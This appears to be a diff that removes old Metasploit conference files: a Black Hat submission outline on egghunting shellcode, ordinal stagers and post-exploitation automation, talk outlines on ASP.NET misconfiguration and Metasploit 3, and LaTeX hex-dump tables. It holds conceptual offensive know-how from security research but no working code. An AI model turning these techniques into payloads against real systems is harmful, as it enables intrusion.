e. Detailed explanation can be found in included resources
|
||||
(include spoonm ordinal paper)
|
||||
2. Reverse Ordinal Stager
|
||||
a. Walks InitOrderModuleList searching for ws2_32
|
||||
b. Uses static ordinals to index the export table
|
||||
c. Creates fd with socket
|
||||
d. Chains connect and recv frames
|
||||
e. Returns into buffer read in from file descriptor
|
||||
C. Egghunting
|
||||
1. Overview
|
||||
a. Small stub payload that can search for a larger payload
|
||||
b. Useful for exploits that have limited payload space but can
|
||||
stash more payload elsewhere in memory
|
||||
c. Example exploits include the IE object type vulnerability.
|
||||
d. Goal is to safely search target address space for the larger
|
||||
payload.
|
||||
e. Larger payload is located by searching for an egg that is prepended
|
||||
to it.
|
||||
f. Detailed analysis can be found in included resources
|
||||
(include egghunt paper)
|
||||
2. Two primary methods of egghunting on Windows
|
||||
a. SEH
|
||||
1. 60 bytes in size, searches for an 8 byte egg, compatible with all
|
||||
versions of Windows (including 9x)
|
||||
2. Installs a custom exception handler
|
||||
3. Begins walking the address space
|
||||
i. When a bad address is encounter, the current pointer is
|
||||
incremented by PAGE_SIZE
|
||||
ii. When a mismatch of the egg is encountered, the current pointer
|
||||
is incremented by one
|
||||
4. Each address is compared against the 8-byte egg
|
||||
i. Bad addresses will throw exceptions which will be handled
|
||||
by the custom exception handler
|
||||
5. When the egg is found, jump past the egg into the larger payload
|
||||
b. System call
|
||||
1. Very small stub (32 bytes), searches for an 8 byte egg, only
|
||||
compatible with NT+
|
||||
2. Uses a non-intrusive system call (NtDisplayString) to search validate
|
||||
addresses
|
||||
i. Same page walking logic as SEH is used
|
||||
3. When the egg is found, jump past the egg into the larger payload
|
||||
3. One primary method of egghunting on Linux
|
||||
a. System call
|
||||
1. 30 bytes in size, searches for an 8 byte egg
|
||||
2. System call technique applies to other UNIX variants as well
|
||||
3. Uses the sigaction system call to validate 16 bytes at once
|
||||
4. Pros
|
||||
i. Very small
|
||||
5. Cons
|
||||
i. Corner cases may cause it to be unstable
|
||||
V. The Complete Picture - Metasploit 3.0
|
||||
A. The power of pre-exploitation prepartion
|
||||
1. Abstract NOP generation
|
||||
2. Abstract payload encoding
|
||||
3. Abstract exploit connection handlers
|
||||
i. Bind handler
|
||||
ii. Reverse handler
|
||||
iii. Findsock handler
|
||||
B. The power of exploit generalization
|
||||
1. Standardized exploit creation interface
|
||||
i. Robust target definitions
|
||||
ii. Detailed exploit implementation information
|
||||
iii. Entirely payload independent, no hardcoding paylaods
|
||||
C. The power of post-exploitation automation
|
||||
1. Complicated tasks made simple with scripting
|
||||
i. Want to download a targets entire harddrive?
|
||||
ii. Want to disable local user interaction?
|
||||
iii. Want to upload and play an mp3 on the target?
|
||||
iv. Want to 'be' on the target's network?
|
||||
2. Standard interface means cross platform support
|
||||
VI. Conclusion - where do we go from here?
|
||||
A. Future Post-exploitation research
|
||||
1. Mesh network support
|
||||
2. Expansion of the stdapi described in this document
|
||||
|
||||
included resources:
|
||||
http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
|
||||
http://www.hick.org/code/skape/papers/meterpreter.pdf
|
||||
http://www.hick.org/code/skape/papers/remote-library-injection.pdf
|
||||
http://www.hick.org/code/skape/papers/passivex.pdf [not released yet]
|
||||
http://www.metasploit.com/users/spoonm/ordinals.txt
|
||||
|
||||
cited material:
|
||||
STRIDE:
|
||||
http://www.ics.forth.gr/carv/acs/ACS/Activities/papers/stride-IFIP-SEC05.pdf
|
||||
|
||||
syscall proxy:
|
||||
http://www.coresecurity.com/files/files/11/SyscallProxying.pdf
|
||||
|
||||
Abstract:
|
||||
|
||||
When we built Metasploit, our focus was on the exploit development process. We
|
||||
tried to design a system that helped create reliable and robust exploits. While
|
||||
this is obviously very important, it's only the first step in the process. What
|
||||
do you do once you own EIP? Our presentation will concentrate on the recent
|
||||
advancements in shellcode, IDS/firewall evasion, and post-exploitation systems.
|
||||
We will discuss the design and implementation of the technologies that enable
|
||||
complex payloads, such as VNC injection, and the suite of tools we've built upon
|
||||
them. We will then present a glimpse of the next generation of Metasploit, and
|
||||
how these new advances will serve as its backbone.
|
||||
|
||||
Blog Entry:
|
||||
|
||||
Blog entry, Stardate April, 2005
|
||||
|
||||
We have recently been on a new shellcode kick, but this time it's not about
|
||||
making them smaller. We're currently working on building very powerful new
|
||||
post-exploitation shellcode and toolkits, and a very powerful unified API to
|
||||
expose their functionality. This will allow us to diverge from precanned
|
||||
payloads, which will in turn allow users to quickly build powerful and portable
|
||||
post-exploitation tools. We have built strongly upon our Windows DLL
|
||||
injection, and are working on extending similar functionality to the land of
|
||||
Unix. We're also working hard on the next version of Metasploit, which follows
|
||||
this same philosophy of embedability and extensablity, allowing users to build
|
||||
their own tools on top of our framework. Our previous work was all about exploit
|
||||
frameworks. In our new approach we are really building more of a hacker tool
|
||||
framework, allowing very strong automation and customization.
|
||||
|
||||
Supporting File(s):
|
||||
|
||||
Additional files/materials? No
|
||||
|
||||
Speaker's Bio(s):
|
||||
|
||||
Spoonm:
|
||||
|
||||
Since late 2003, spoonm has been one of the core developers behind the
|
||||
Metasploit Project. He is responsible for much of the architecture in version
|
||||
2.0, as well as other components including encoders, nop generators, and a
|
||||
polymorphic shellcode engine. A full-time student at a northern university,
|
||||
spoonm spends too much of his free time on security research projects.
|
||||
|
||||
Skape:
|
||||
|
||||
Skape is a lead software developer by day and an independent security researcher
|
||||
by night. He joined forces with the Metasploit project in 2004 where his many
|
||||
contributions have included the Meterpreter, VNC injection, and many other
|
||||
payload advances. Skape has worked on a number of open-source projects and has
|
||||
authored several papers on security related technologies. His current security
|
||||
related interests include post-exploitation technologies, payload development
|
||||
and optimization, and exploitation prevention technology.
|
||||
|
||||
Transfer of Copyright
|
||||
|
||||
I warrant that the above work has not been previously published elsewhere, or if
|
||||
it has, that I have obtained permission for its publication by Black Hat, Inc.
|
||||
and that I will promptly supply Black Hat, Inc. with wording for crediting the
|
||||
original publication and copyright owner.
|
||||
|
||||
If I am selected for presentation, I hereby give Black Hat, Inc. permission to
|
||||
duplicate, record and redistribute this presentation; including, but not limited
|
||||
to, the conference proceedings, conference CD, video, audio, hand outs(s) to the
|
||||
conference attendees for educational, on-line and all other purposes.
|
||||
|
||||
Yes, I, (insert primary speaker name), have read the above and agree to the
|
||||
Transfer of Copyright.
|
||||
|
||||
Agreement to Terms of Speaking Requirements
|
||||
|
||||
If I am selected to speak, I understand that I must complete and fulfill the
|
||||
following requirements or I will forfeit my honorarium:
|
||||
|
||||
1) I will submit a completed presentation in Powerpoint format for publication
|
||||
in the printed conference proceedings by the date specified in the CFP Letter of
|
||||
Acceptance.
|
||||
|
||||
2) I understand if I fail to submit a completed presentation by the date
|
||||
specified in the CFP Letter of Acceptance, I may be replaced by an alternate
|
||||
presentation or, if allowed to present, will forfeit $250 of my honorarium.
|
||||
|
||||
3) I will submit a completed (and possibly updated) presentation, a copy of the
|
||||
tool(s) and/or code(s), and a reference to all of the tool(s), law(s), Web sites
|
||||
and/or publications referenced to at the end of my talk and as described in this
|
||||
CFP submission for publication on the conference CD by the date specified in the
|
||||
CFP Letter of Acceptance.
|
||||
|
||||
4) I will include a detailed bibliography as either a separate document or
|
||||
included within the presentation of all resources cited and/or used in my
|
||||
presentation.
|
||||
|
||||
5) I will be on hand and accessible to delegates during Black Hat social events
|
||||
including, but not limited to, luncheons and receptions.
|
||||
|
||||
6) I will complete my presentation in the time allocated to me - not ending 15
|
||||
minutes before or running 5 minutes over the time allocation.
|
||||
|
||||
7) I understand that Black Hat will provide 2 lcd projectors, 2 screens,
|
||||
microphone, and video switch box. I understand that I am responsible for
|
||||
providing all other necessary equipment, including laptops and machines, to
|
||||
complete my presentation.
|
||||
|
||||
8) I will submit, within 5 days of the completion of the conference, any
|
||||
updated, revised or additional presentation(s) or materials that were used in my
|
||||
presentation but not included on the conference CD or conference proceedings.
|
||||
|
||||
I, spoonm, have read the above and understand and agree
|
||||
to the terms as detailed in the Agreement to Terms of Speaking Requirements.
|
||||
|
||||
Agreement to Terms of Speaking Remuneration
|
||||
|
||||
1) I understand that Black Hat will only pay for one roundtrip coach class
|
||||
airfare per presentation.
|
||||
|
||||
2) I understand that if I choose to arrange the airfare myself, I must first
|
||||
receive approval from the Conference Administrator or I will not be reimbursed
|
||||
for the airfare. I understand that if I wish to be reimbursed for airfare, I
|
||||
must supply a valid receipt in the form of a travel agency issued air itinerary
|
||||
and/or ticket receipt with the airfare printed on it. I understand that there is
|
||||
a $750 cap for airfare and I will be reimbursed for up to that amount.
|
||||
|
||||
3) I understand that if I choose to travel by automobile I will receive $0.32
|
||||
per mile, roundtrip, as reimbursement. If I travel by rail or bus I will be
|
||||
reimbursed for the cost of the ticket price.
|
||||
|
||||
4) I understand that Black Hat will pay for one hotel room for three nights at
|
||||
the official venue hotel.
|
||||
|
||||
5) I understand that I will be required to provide the hotel with a valid credit
|
||||
card on check in to secure the room and any and all additional costs incurred by
|
||||
me (including but not limited to room service, phone line usage, room internet
|
||||
access, movies, etc) WILL NOT be reimbursed by Black Hat.
|
||||
|
||||
6) I understand that the person listed as the primary speaker will be required
|
||||
to complete a W9 form (only if a US citizen) in order to be paid. Non-US
|
||||
citizens will be paid via wire transfer (or you may choose to be paid with a
|
||||
company check).
|
||||
|
||||
7) I understand that Black Hat will issue one payment per presentation and the
|
||||
check will be issued to the person listed as the primary speaker. Payment will
|
||||
be made net 30 from the end of the conference.
|
||||
|
||||
8) I understand that the name and address on the W9 or wire transfer is where
|
||||
the payment will be sent.
|
||||
|
||||
9) I understand that if I am employed by an official Black Hat sponsor, that I
|
||||
will not receive any compensation for travel, hotel accommodations or an
|
||||
honorarium from Black Hat, Inc.
|
||||
|
||||
10) I understand that should my talk be determined to be a vendor or sales pitch
|
||||
that I will not receive any reimbursement for travel, hotel accommodations or an
|
||||
honorarium.
|
||||
|
||||
11) I understand that should my talk be selected for the "Turbo Talks" I will
|
||||
ONLY receive entrance to the Briefings. As a "Turbo Talks" presenter, I WILL NOT
|
||||
receive a speaking honorarium or compensation for hotel or travel.
|
||||
|
||||
Yes, I, spoonm, have read the above and understand and
|
||||
agree to the terms as detailed in the Agreement to Terms of Speaking
|
||||
Remuneration or I will forfeit my honorarium.
|
|
@ -1,81 +0,0 @@
|
|||
Title:
|
||||
|
||||
Bitten on the ASP
|
||||
|
||||
(How NOT to deploy ASP.NET applications)
|
||||
|
||||
|
||||
Intro:
|
||||
|
||||
Who
|
||||
BreakingPoint
|
||||
Metasploit
|
||||
What
|
||||
ASP.Net deployment issues
|
||||
Default configuration
|
||||
Common configuration flaws
|
||||
Platform problems
|
||||
Why
|
||||
Widely deployed
|
||||
Poorly researched
|
||||
Lack of tools
|
||||
|
||||
Basics
|
||||
|
||||
Global default configuration file
|
||||
Code separated into Applications
|
||||
Applications override configuration file
|
||||
|
||||
Structure
|
||||
Sample web application structure
|
||||
Visual studio files
|
||||
Deploy vs Copy
|
||||
|
||||
IIS Integration
|
||||
Extension vs ASP.Net mappings
|
||||
What files have no mapping?
|
||||
|
||||
Cryptography
|
||||
MAC Key
|
||||
Encryption Key
|
||||
ViewState / Session Generation
|
||||
|
||||
Sessions
|
||||
CookieLess
|
||||
InProcess
|
||||
StateServer
|
||||
Possible flaws
|
||||
SQL Database
|
||||
Field lengths, character data
|
||||
Sliding Sessions...
|
||||
Florida example
|
||||
|
||||
Error Handling
|
||||
Default settings
|
||||
aspxerrorpath tricks
|
||||
Information disclosure
|
||||
|
||||
Forms Authentication
|
||||
?
|
||||
|
||||
ViewState Information
|
||||
Data leak, MAC, etc.
|
||||
|
||||
Debugging
|
||||
Debugging left enabled
|
||||
Tracing left enabled!
|
||||
|
||||
Overview
|
||||
Locking down ASP.Net is not hard
|
||||
Thousands of sites arent doing it
|
||||
Microsoft Terra ServerDopostback/rss.aspx
|
||||
Microsoft Research
|
||||
Summary
|
||||
Vulns
|
||||
Tools
|
||||
Fixes
|
||||
Done
|
||||
|
||||
|
||||
|
||||
IssueTracker.mdb
|
|
@ -1,75 +0,0 @@
|
|||
Title:
|
||||
|
||||
Metasploit^3
|
||||
|
||||
Intro:
|
||||
|
||||
Who
|
||||
BreakingPoint
|
||||
Metasploit
|
||||
What
|
||||
Exploit framework evolution
|
||||
|
||||
Why
|
||||
Exploits are commodities
|
||||
Integration is the tricky part
|
||||
Who needs a shell when...
|
||||
Merge of two distinct users
|
||||
Network admins
|
||||
Penetration testers
|
||||
|
||||
Exploit Frameworks
|
||||
Development platform for exploit code
|
||||
Shrink exploit development time
|
||||
Enable security research
|
||||
Automation
|
||||
|
||||
Metasploit
|
||||
Started off with ~7 exploits
|
||||
v1 - 2,000 lines of perl
|
||||
v2 - 40,000 lines of perl, 3,000 asm, 7,000 C
|
||||
v3 - 80,000 lines of perl, 4,000 asm, 12,000 C
|
||||
Exploit launcher
|
||||
Modular components
|
||||
Consistent interface
|
||||
Three UI's
|
||||
Metasploit^3
|
||||
Complete rewrite in the Ruby language
|
||||
Code compression ~40%
|
||||
Completely OO, no more dirty perl tricks
|
||||
Focused on simplicity, consistency, extensibility
|
||||
|
||||
Architecture
|
||||
Rex Library
|
||||
MSF Library
|
||||
MSF Core
|
||||
MSF Interfaces
|
||||
|
||||
Libraries
|
||||
Create your own MSF app in ~5 lines of code :-)
|
||||
Simple to work with any module programatically
|
||||
Write standalone security apps using our libs
|
||||
|
||||
Concepts
|
||||
Interfaces
|
||||
Load and interact with modules
|
||||
Jobs
|
||||
Modules running in the background
|
||||
Sessions
|
||||
Interactive shells and more
|
||||
Modules
|
||||
Payloads
|
||||
Encoders
|
||||
Nops
|
||||
Exploits
|
||||
Auxiliary
|
||||
|
||||
Plugins
|
||||
Extend anything at runtime
|
||||
|
||||
Examples
|
||||
Reconnaisance module
|
||||
Passive exploit modules
|
||||
Handling multiple sessions
|
||||
|
||||
|
|
@ -1,77 +0,0 @@
|
|||
\definecolor{Hexy110}{rgb}{0.431,0,0.568}
|
||||
\definecolor{Hexy118}{rgb}{0.462,0,0.537}
|
||||
\definecolor{Hexy135}{rgb}{0.529,0,0.470}
|
||||
\definecolor{Hexy106}{rgb}{0.415,0,0.584}
|
||||
\definecolor{Hexy107}{rgb}{0.419,0,0.580}
|
||||
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
|
||||
\definecolor{Hexy106}{rgb}{0.415,0,0.584}
|
||||
\definecolor{Hexy104}{rgb}{0.407,0,0.592}
|
||||
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
|
||||
\definecolor{Hexy102}{rgb}{0.4,0,0.6}
|
||||
\definecolor{Hexy119}{rgb}{0.466,0,0.533}
|
||||
\definecolor{Hexy111}{rgb}{0.435,0,0.564}
|
||||
\definecolor{Hexy109}{rgb}{0.427,0,0.572}
|
||||
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
|
||||
\definecolor{Hexy108}{rgb}{0.423,0,0.576}
|
||||
\definecolor{Hexy119}{rgb}{0.466,0,0.533}
|
||||
\definecolor{Hexy112}{rgb}{0.439,0,0.560}
|
||||
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
|
||||
\definecolor{Hexy88}{rgb}{0.345,0,0.654}
|
||||
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
|
||||
\definecolor{Hexy106}{rgb}{0.415,0,0.584}
|
||||
\definecolor{Hexy103}{rgb}{0.403,0,0.596}
|
||||
\definecolor{Hexy113}{rgb}{0.443,0,0.556}
|
||||
\definecolor{Hexy112}{rgb}{0.439,0,0.560}
|
||||
\definecolor{Hexy123}{rgb}{0.482,0,0.517}
|
||||
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
|
||||
\definecolor{Hexy118}{rgb}{0.462,0,0.537}
|
||||
\definecolor{Hexy124}{rgb}{0.486,0,0.513}
|
||||
\definecolor{Hexy112}{rgb}{0.439,0,0.560}
|
||||
\definecolor{Hexy124}{rgb}{0.486,0,0.513}
|
||||
\definecolor{Hexy107}{rgb}{0.419,0,0.580}
|
||||
\definecolor{Hexy120}{rgb}{0.470,0,0.529}
|
||||
\definecolor{Hexy110}{rgb}{0.431,0,0.568}
|
||||
\definecolor{Hexy86}{rgb}{0.337,0,0.662}
|
||||
\definecolor{Hexy100}{rgb}{0.392,0,0.607}
|
||||
\definecolor{Hexy113}{rgb}{0.443,0,0.556}
|
||||
\definecolor{Hexy137}{rgb}{0.537,0,0.462}
|
||||
\definecolor{Hexy108}{rgb}{0.423,0,0.576}
|
||||
\definecolor{Hexy120}{rgb}{0.470,0,0.529}
|
||||
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
|
||||
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
|
||||
\definecolor{Hexy223}{rgb}{0.874,0,0.125}
|
||||
\definecolor{Hexy122}{rgb}{0.478,0,0.521}
|
||||
\definecolor{Hexy121}{rgb}{0.474,0,0.525}
|
||||
\definecolor{Hexy86}{rgb}{0.337,0,0.662}
|
||||
\definecolor{Hexy130}{rgb}{0.509,0,0.490}
|
||||
\definecolor{Hexy118}{rgb}{0.462,0,0.537}
|
||||
\definecolor{Hexy119}{rgb}{0.466,0,0.533}
|
||||
\definecolor{Hexy124}{rgb}{0.486,0,0.513}
|
||||
\definecolor{Hexy113}{rgb}{0.443,0,0.556}
|
||||
\definecolor{Hexy127}{rgb}{0.498,0,0.501}
|
||||
\definecolor{Hexy105}{rgb}{0.411,0,0.588}
|
||||
\definecolor{Hexy0}{rgb}{0,0,0}
|
||||
\definecolor{HexyGreen}{rgb}{0,.7,0}
|
||||
{\footnotesize
|
||||
\begin{semiverbatim}
|
||||
total: 6000
|
||||
uniq: 52
|
||||
\color{HexyGreen}\color{HexyGreen} 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
|
||||
\color{HexyGreen}00 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}10 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}20 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy110}6e \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy118}76
|
||||
\color{HexyGreen}30 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy135}87 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy106}6a
|
||||
\color{HexyGreen}40 \color{Hexy107}6b \color{Hexy114}72 \color{Hexy106}6a \color{Hexy104}68 \color{Hexy116}74 \color{Hexy102}66 \color{Hexy119}77 \color{Hexy111}6f \color{Hexy109}6d \color{Hexy116}74 \color{Hexy108}6c \color{Hexy119}77 \color{Hexy112}70 \color{Hexy116}74 \color{Hexy88}58 \color{Hexy114}72
|
||||
\color{HexyGreen}50 \color{Hexy106}6a \color{Hexy103}67 \color{Hexy113}71 \color{Hexy112}70 \color{Hexy123}7b \color{Hexy116}74 \color{Hexy118}76 \color{Hexy124}7c \color{Hexy112}70 \color{Hexy124}7c \color{Hexy107}6b \color{Hexy120}78 \color{Hexy0}00 \color{Hexy110}6e \color{Hexy86}56 \color{Hexy100}64
|
||||
\color{HexyGreen}60 \color{Hexy113}71 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}70 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}80 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}90 \color{Hexy0}00 \color{Hexy137}89 \color{Hexy108}6c \color{Hexy120}78 \color{Hexy0}00 \color{Hexy116}74 \color{Hexy114}72 \color{Hexy223}df \color{Hexy122}7a \color{Hexy121}79 \color{Hexy0}00 \color{Hexy86}56 \color{Hexy130}82 \color{Hexy0}00 \color{Hexy118}76 \color{Hexy119}77
|
||||
\color{HexyGreen}a0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}b0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}c0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}d0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}e0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}f0 \color{Hexy0}00 00 00 00 00 \color{Hexy124}7c \color{Hexy0}00 00 \color{Hexy113}71 \color{Hexy127}7f \color{Hexy0}00 00 \color{Hexy105}69 \color{Hexy0}00 00 00
|
||||
\end{semiverbatim}
|
||||
}
|
|
@ -1,77 +0,0 @@
|
|||
\definecolor{Hexy100}{rgb}{0.392,0,0.607}
|
||||
\definecolor{Hexy111}{rgb}{0.435,0,0.564}
|
||||
\definecolor{Hexy120}{rgb}{0.470,0,0.529}
|
||||
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
|
||||
\definecolor{Hexy127}{rgb}{0.498,0,0.501}
|
||||
\definecolor{Hexy107}{rgb}{0.419,0,0.580}
|
||||
\definecolor{Hexy111}{rgb}{0.435,0,0.564}
|
||||
\definecolor{Hexy123}{rgb}{0.482,0,0.517}
|
||||
\definecolor{Hexy121}{rgb}{0.474,0,0.525}
|
||||
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
|
||||
\definecolor{Hexy117}{rgb}{0.458,0,0.541}
|
||||
\definecolor{Hexy115}{rgb}{0.450,0,0.549}
|
||||
\definecolor{Hexy118}{rgb}{0.462,0,0.537}
|
||||
\definecolor{Hexy88}{rgb}{0.345,0,0.654}
|
||||
\definecolor{Hexy111}{rgb}{0.435,0,0.564}
|
||||
\definecolor{Hexy122}{rgb}{0.478,0,0.521}
|
||||
\definecolor{Hexy108}{rgb}{0.423,0,0.576}
|
||||
\definecolor{Hexy120}{rgb}{0.470,0,0.529}
|
||||
\definecolor{Hexy122}{rgb}{0.478,0,0.521}
|
||||
\definecolor{Hexy126}{rgb}{0.494,0,0.505}
|
||||
\definecolor{Hexy113}{rgb}{0.443,0,0.556}
|
||||
\definecolor{Hexy109}{rgb}{0.427,0,0.572}
|
||||
\definecolor{Hexy101}{rgb}{0.396,0,0.603}
|
||||
\definecolor{Hexy117}{rgb}{0.458,0,0.541}
|
||||
\definecolor{Hexy127}{rgb}{0.498,0,0.501}
|
||||
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
|
||||
\definecolor{Hexy123}{rgb}{0.482,0,0.517}
|
||||
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
|
||||
\definecolor{Hexy113}{rgb}{0.443,0,0.556}
|
||||
\definecolor{Hexy119}{rgb}{0.466,0,0.533}
|
||||
\definecolor{Hexy109}{rgb}{0.427,0,0.572}
|
||||
\definecolor{Hexy100}{rgb}{0.392,0,0.607}
|
||||
\definecolor{Hexy113}{rgb}{0.443,0,0.556}
|
||||
\definecolor{Hexy124}{rgb}{0.486,0,0.513}
|
||||
\definecolor{Hexy100}{rgb}{0.392,0,0.607}
|
||||
\definecolor{Hexy115}{rgb}{0.450,0,0.549}
|
||||
\definecolor{Hexy107}{rgb}{0.419,0,0.580}
|
||||
\definecolor{Hexy121}{rgb}{0.474,0,0.525}
|
||||
\definecolor{Hexy135}{rgb}{0.529,0,0.470}
|
||||
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
|
||||
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
|
||||
\definecolor{Hexy232}{rgb}{0.909,0,0.090}
|
||||
\definecolor{Hexy107}{rgb}{0.419,0,0.580}
|
||||
\definecolor{Hexy104}{rgb}{0.407,0,0.592}
|
||||
\definecolor{Hexy118}{rgb}{0.462,0,0.537}
|
||||
\definecolor{Hexy91}{rgb}{0.356,0,0.643}
|
||||
\definecolor{Hexy109}{rgb}{0.427,0,0.572}
|
||||
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
|
||||
\definecolor{Hexy117}{rgb}{0.458,0,0.541}
|
||||
\definecolor{Hexy87}{rgb}{0.341,0,0.658}
|
||||
\definecolor{Hexy107}{rgb}{0.419,0,0.580}
|
||||
\definecolor{Hexy111}{rgb}{0.435,0,0.564}
|
||||
\definecolor{Hexy0}{rgb}{0,0,0}
|
||||
\definecolor{HexyGreen}{rgb}{0,.7,0}
|
||||
{\footnotesize
|
||||
\begin{semiverbatim}
|
||||
total: 6000
|
||||
uniq: 52
|
||||
\color{HexyGreen}\color{HexyGreen} 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
|
||||
\color{HexyGreen}00 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}10 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}20 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy100}64 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy111}6f
|
||||
\color{HexyGreen}30 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy120}78 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy116}74
|
||||
\color{HexyGreen}40 \color{Hexy127}7f \color{Hexy107}6b \color{Hexy111}6f \color{Hexy123}7b \color{Hexy121}79 \color{Hexy114}72 \color{Hexy117}75 \color{Hexy115}73 \color{Hexy118}76 \color{Hexy88}58 \color{Hexy111}6f \color{Hexy122}7a \color{Hexy108}6c \color{Hexy120}78 \color{Hexy122}7a \color{Hexy126}7e
|
||||
\color{HexyGreen}50 \color{Hexy113}71 \color{Hexy109}6d \color{Hexy101}65 \color{Hexy117}75 \color{Hexy127}7f \color{Hexy114}72 \color{Hexy123}7b \color{Hexy114}72 \color{Hexy113}71 \color{Hexy119}77 \color{Hexy109}6d \color{Hexy100}64 \color{Hexy0}00 \color{Hexy113}71 \color{Hexy124}7c \color{Hexy100}64
|
||||
\color{HexyGreen}60 \color{Hexy115}73 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}70 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}80 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}90 \color{Hexy0}00 \color{Hexy107}6b \color{Hexy121}79 \color{Hexy135}87 \color{Hexy0}00 \color{Hexy116}74 74 \color{Hexy232}e8 \color{Hexy107}6b \color{Hexy104}68 \color{Hexy0}00 \color{Hexy118}76 \color{Hexy91}5b \color{Hexy0}00 \color{Hexy109}6d \color{Hexy114}72
|
||||
\color{HexyGreen}a0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}b0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}c0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}d0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}e0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
\color{HexyGreen}f0 \color{Hexy0}00 00 00 00 00 \color{Hexy117}75 \color{Hexy0}00 00 \color{Hexy87}57 \color{Hexy107}6b \color{Hexy0}00 00 \color{Hexy111}6f \color{Hexy0}00 00 00
|
||||
\end{semiverbatim}
|
||||
}
|
|
@ -1,4 +0,0 @@
|
|||
#!/bin/sh
|
||||
for((i = 0; i < 2; i++)); do
|
||||
pdflatex csw05
|
||||
done
|
|
@ -1,166 +0,0 @@
|
|||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
|
||||
